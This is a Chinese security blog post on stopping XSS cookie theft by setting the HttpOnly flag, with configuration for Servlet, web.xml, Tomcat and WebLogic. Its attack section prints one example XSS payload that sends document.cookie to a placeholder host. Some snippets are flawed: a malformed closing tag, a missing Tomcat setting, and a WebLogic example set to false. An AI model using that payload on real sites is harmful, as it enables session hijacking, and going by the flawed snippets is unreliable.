漏洞解决方案-HttpOnly设置

• 漏洞解决方案-HttpOnly设置
• • • • 漏洞概述
      • 攻击步骤
      • 设置方法

漏洞解决方案-HttpOnly设置

漏洞概述

在Web安全领域，跨站脚本攻击时最为常见的一种攻击形式，也是长久以来的一个老大难问题，HTTP-only cookie是一种用以缓解跨站脚本攻击的技术，如果您在cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止XSS盗取用户cookie。

攻击步骤

1. 测试并发现一个存在XSS漏洞网站。
2. 通过XSS漏洞，插入恶意链接：

<img src= ‘http://xxxx/cookie.php?cookie='+encodeURIComponent(document.cookie)>
           

1. 当其他用户访问相关页面时，恶意插入的代码被执行，用户的cookie信息被发送到恶意链接地址。

设置方法

1. Servlet2.5及以下版本，不支持httpOnly，可通过response.addHeader或response.setHeader设置httponly。

   （1）response.addHeader

//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");

（2）response.setHeader
response.setHeader("Set-Cookie","cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
           

1. Servlet3.0提供SessionCookieConfig接口，用于操作会话Cookie，其中有setHttpOnly(boolean httpOnly) 设置是否支持HttpOnly属性。

1. 也可以在web.xml配置如下：

<session-config>
	<cookie-config>
		<http-only>true</http-only>
	</cookie-config>
<session-config>
           

1. 对于tomcat6支持对JSESSIONID的cookie设置HttpOnly,

   具体的设置是在context.xml配置文件中进行设置的，为Context标签添加如下属性即可开启或禁止HttpOnly：

1. 对于weblogic,可以在weblogic.xml里添加

<session-descriptor>
	<cookie-http-only>false</cookie-http-only>
</session-descriptor>
           

关注公众号，一起分享实用安全技术，关注安全最新事件，记录工作常见问题，吐槽生活真心操蛋。